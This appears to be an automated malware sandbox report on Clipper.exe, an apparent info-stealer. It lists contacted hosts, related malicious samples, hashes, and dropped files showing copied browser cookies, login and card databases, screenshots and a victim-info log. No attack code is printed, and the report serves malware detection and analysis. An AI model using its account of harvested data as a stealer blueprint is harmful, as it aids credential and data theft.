  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
12:46:43API Interceptor1x Sleep call for process: Clipper.exe modified
12:46:46API Interceptor4x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
149.154.167.220Cryptor.exeGet hashmaliciousLuca StealerBrowse
    Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
          SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            Attachments.zipGet hashmaliciousUnknownBrowse
              DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                  sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                    Due Invoice pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      195.201.57.90cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                      • /?output=json
                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      • /?output=json
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • /?output=json
                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                      • /?output=json
                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                      • /?output=json
                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • /?output=json
                      3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/
                      KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                      • ipwhois.app/xml/
                      file.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/
                      file.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ipwho.iscOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 195.201.57.90
                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                      • 195.201.57.90
                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                      • 195.201.57.90
                      KR6nDu9fLhop1bFe.exeGet hashmaliciousQuasarBrowse
                      • 195.201.57.90
                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 195.201.57.90
                      http://nxxoui9ah5qto.pages.dev/smart89Get hashmaliciousUnknownBrowse
                      • 195.201.57.90
                      01vwXiyQ8K.exeGet hashmaliciousQuasarBrowse
                      • 195.201.57.90
                      http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                      • 195.201.57.90
                      api.telegram.orgCryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 149.154.167.220
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 149.154.167.220
                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 149.154.167.220
                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                      • 149.154.167.220
                      SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 149.154.167.220
                      Attachments.zipGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      Due Invoice pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 149.154.167.220

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      TELEGRAMRUCryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 149.154.167.220
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 149.154.167.220
                      SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 149.154.167.99
                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 149.154.167.220
                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                      • 149.154.167.220
                      http://www.aviatorx.sbs.recl.cc/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://telegram-vn.com/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://dl.dir.freefiremobile.com.sg5.putrivpn.biz.id/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://b9824.top/Get hashmaliciousUnknownBrowse
                      • 149.154.170.96
                      Rtq5bR0yeF.exeGet hashmaliciousRedLineBrowse
                      • 149.154.167.99
                      HETZNER-ASDEcOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 195.201.57.90
                      SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 159.69.102.132
                      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                      • 116.202.102.103
                      PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                      • 178.63.50.103
                      RFQ price list.scr.exeGet hashmaliciousUnknownBrowse
                      • 88.99.137.18
                      Revised Order.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                      • 135.181.212.206
                      RFQ price list.scr.exeGet hashmaliciousUnknownBrowse
                      • 88.99.137.18
                      QT-2402078.scr.exeGet hashmaliciousUnknownBrowse
                      • 88.99.137.18

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eCryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 149.154.167.220
                      SecuriteInfo.com.Win32.Malware-gen.18534.23013.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 149.154.167.220
                      Authenticator.exeGet hashmaliciousBazaLoaderBrowse
                      • 149.154.167.220
                      Payment Advice Ref 20240516908654223454899.scr.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      Aviz de Plata_Comert_Bank_pdf.scr.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      IKwhIZp9xe.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 149.154.167.220
                      Aviz de Plata_Comert_Bank_pdf.scr.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      Biodu Kenya Ltd.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      file.exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      PROFORMA INV.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 149.154.167.220

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:Nlllul3nqth:NllUa
                      MD5:851531B4FD612B0BC7891B3F401A478F
                      SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                      SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                      SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:@...e.................................&..............@..........

                      C:\Users\user\AppData\Local\Temp\Cookies

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                      Category:dropped
                      Size (bytes):20480
                      Entropy (8bit):0.6732424250451717
                      Encrypted:false
                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\History

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):155648
                      Entropy (8bit):0.5407252242845243
                      Encrypted:false
                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                      MD5:7B955D976803304F2C0505431A0CF1CF
                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\Login Data

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\Web Data

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Chrome_Default_Network.txt

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):286
                      Entropy (8bit):5.7588025104123
                      Encrypted:false
                      SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                      MD5:07691E9F2983932701060D0FC5588075
                      SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                      SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                      SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                      Malicious:false
                      Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

                      C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\screen1.png

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):944659
                      Entropy (8bit):7.578636315011459
                      Encrypted:false
                      SSDEEP:24576:sTAcuVvwM6Rb0f36VY/DUYzcMevNTm3u2:rcQxUYevw
                      MD5:4438231671D9C1E35020BB2C9C030F21
                      SHA1:0E9A15C025367AEEA20E96C45622787CFAA9A569
                      SHA-256:E5C3BD157A8F424A520ED5A474957A6A3FBC0D76B8D8573E1218BC66CE70589C
                      SHA-512:D1E3D139585D26304FA2B0AFF01209822F3FD9CE1CEAF4988EC5A2364FEBF56182E3C22CBABF01EFF318CE6569E99484452C884BC0DEDE1D2FA40581D2BC1D42
                      Malicious:false
                      Preview:.PNG........IHDR................C..i.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                      C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\sensitive-files.zip

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                      Category:dropped
                      Size (bytes):29958
                      Entropy (8bit):7.847962777481426
                      Encrypted:false
                      SSDEEP:384:7kihfuJ0cy3yc7K7I6b6g6T2AnMhpNzkihfuJ0cy3yc7K7I6b6g6T2AnMhpNBLv:7kiluJ3AJoRe2AakiluJ3AJoRe2Asz
                      MD5:BC1E38DCD39A7C76EE718F608FBD0246
                      SHA1:A1371A4A19805ABFD2347C8845124F77AA868122
                      SHA-256:74D757A1F600895217FAE7ACE213AA4C4FBD303D7BA0BCDD97942C949734DD87
                      SHA-512:0B416189075327DA46B745A5BE25A27E4DFD0BD4F3B66893C02280CA516D8CD5E092E02C29D7DE37997A62CFC0B4280FE53B666AF3932B2359DE37F512554F98
                      Malicious:false
                      Preview:PK...........X...s............BJZFPPWAPT.png..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........Xm?..............CZQKSDDMWR.png..I.E!.E......"._.wH4...#.......V......,.c5..M{.6..HR.^3..u.F....OU...VX.B..k...S...@45.R.....1n.r.+...Hr.fu...X?.`ps.....o....C,......'.......r.*.>......k......S)pr.0'..x.N]..o;..=.....9^:.....M.t%..g._.f=...w.=0.......b.H....(...3...r....m..Z.

                      C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\user_info.txt

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                      Category:dropped
                      Size (bytes):666
                      Entropy (8bit):5.337860128589585
                      Encrypted:false
                      SSDEEP:12:eM36nIQN3eyQ8bjx6YjrJFQ+lQM7NlVaVIBQM3aWfgyIHdAMij01+ajXaBLF:exVNbxxVJ+XM7NlVaVIe8dOAMijUlqBh
                      MD5:79EF9DAF9552353BD91D145D497A24EA
                      SHA1:C965019D9402A467FE7AA00EC6AF3D5840A05364
                      SHA-256:9502B38F7A930D69C2662BD23B89E37C669680A056E1E926B08AA5A755B600EE
                      SHA-512:B99C7187C0AEEC39218FD58456A969F0CE225F1E50044CA5839E1777E8BB9321671F80DE99271E7073BF7B4B88600FCAF60063C19A4A6D92B5CBB187FC6A2DEF
                      Malicious:false
                      Preview:..- IP Info -....IP: 173.254.250.91..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - 9U6K4TPK4 (1280, 1024)..HWID: 8938522624742244..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Clipper.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 40...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxv0zssw.zkd.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz4pdqsw.kbi.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\out.zip

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                      Category:dropped
                      Size (bytes):978501
                      Entropy (8bit):7.599338590095629
                      Encrypted:false
                      SSDEEP:24576:jTAcuVvwM6Rb0f36VY/DUYzcMevNTm3uy:icQxUYevs
                      MD5:7B2059F739E11BB1BDD18580B40CAEAE
                      SHA1:47F7318E5376138615E347F540DE6CB27849B36D
                      SHA-256:4CFAB6840969BD81C8C55E473FDB47CAB916364890A187C6D887D3B3EE6557B5
                      SHA-512:1C39A5D928FD28C74FCCFFB3C0827DDDB07FFEB336AAC3E8F3C09691A48FD945B59AFF6CE3C9361A76D8B2DB26691BB999D9E61D0EE02CEAA3EF939B52F6377C
                      Malicious:false
                      Preview:PK...........X................Autofill/PK...........X................Cookies/PK...........X................CreditCards/PK...........X................Downloads/PK...........X................History/PK...........X................Passwords/PK...........X.Y./.j...j......screen1.png.PNG........IHDR................C..i.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                      C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                      Category:dropped
                      Size (bytes):29958
                      Entropy (8bit):7.847962777481426
                      Encrypted:false
                      SSDEEP:384:7kihfuJ0cy3yc7K7I6b6g6T2AnMhpNzkihfuJ0cy3yc7K7I6b6g6T2AnMhpNBLv:7kiluJ3AJoRe2AakiluJ3AJoRe2Asz
                      MD5:BC1E38DCD39A7C76EE718F608FBD0246
                      SHA1:A1371A4A19805ABFD2347C8845124F77AA868122
                      SHA-256:74D757A1F600895217FAE7ACE213AA4C4FBD303D7BA0BCDD97942C949734DD87
                      SHA-512:0B416189075327DA46B745A5BE25A27E4DFD0BD4F3B66893C02280CA516D8CD5E092E02C29D7DE37997A62CFC0B4280FE53B666AF3932B2359DE37F512554F98
                      Malicious:false
                      Preview:PK...........X...s............BJZFPPWAPT.png..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........Xm?..............CZQKSDDMWR.png..I.E!.E......"._.wH4...#.......V......,.c5..M{.6..HR.^3..u.F....OU...VX.B..k...S...@45.R.....1n.r.+...Hr.fu...X?.`ps.....o....C,......'.......r.*.>......k......S)pr.0'..x.N]..o;..=.....9^:.....M.t%..g._.f=...w.=0.......b.H....(...3...r....m..Z.

                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                      Download File
                      Process:C:\Users\user\Desktop\Clipper.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.017262956703125623
                      Encrypted:false
                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                      Malicious:false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                      Entropy (8bit):7.946315824097804
                      TrID:
                      • Win64 Executable GUI (202006/5) 81.26%
                      • UPX compressed Win32 Executable (30571/9) 12.30%
                      • Win64 Executable (generic) (12005/4) 4.83%
                      • Generic Win/DOS Executable (2004/3) 0.81%
                      • DOS Executable Generic (2002/1) 0.81%
                      File name:Clipper.exe
                      File size:2'269'184 bytes
                      MD5:a0a3146b324c02ed258e040e035bcec2
                      SHA1:4635d5ddba61b0e4ab04549b28c854f4193de364
                      SHA256:d6fa02a17eb8e18ae484e4af8462eb4362b1ab883e48a6a5c03c265dd867bf6f
                      SHA512:6770b6514e39b57a187188cb5ce7a44ddb8e0d36ed74f4ea3f5b544bd4f81354a0ca73c25141b528c8d707ee296971ca5e50931b5a239e056034fa36c02a13cb
                      SSDEEP:49152:l9BTMxaCRVQw6N9zcEvIp2azx+au9O5VT4PUY3c0i:l9maCRVYBcE48s5d
                      TLSH:6EB533AD590761F1D9EDA0FFF8232D8B65DC8B3BE9C2D159CC90D60D64B04B08C8D96A
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x140545f00
                      Entrypoint Section:UPX1
                      Digitally signed:false
                      Imagebase:0x140000000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x664FF26D [Fri May 24 01:50:37 2024 UTC]
                      TLS Callbacks:0x405461a5, 0x1
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
